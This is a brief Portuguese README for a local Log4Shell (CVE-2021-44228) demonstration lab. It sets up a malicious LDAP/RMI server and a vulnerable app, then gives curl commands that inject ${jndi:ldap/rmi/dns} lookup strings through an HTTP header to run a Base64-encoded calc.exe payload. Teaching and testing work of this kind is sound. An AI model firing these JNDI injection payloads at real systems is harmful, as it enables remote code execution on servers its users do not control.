
Exemplos de Log4j CVE-2021-44228: Execução Remota de Código (através de LDAP, RMI, ...), Consultas DNS forçadas, ...
Use um JDK vulnerável, por exemplo JDK 1.8.0_181
O servidor malicioso implanta os seguintes endpoints:
./gradlew :malicious-server:bootRun
A aplicação vulnerável implanta um endpoint HTTP na 8082
./gradlew :vulnerable-app:bootRun
Escolha um payload que será executado pela aplicação vulnerável e codifique-o em Base64. Como exemplo, para abrir a calculadora no Windows: calc.exe
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/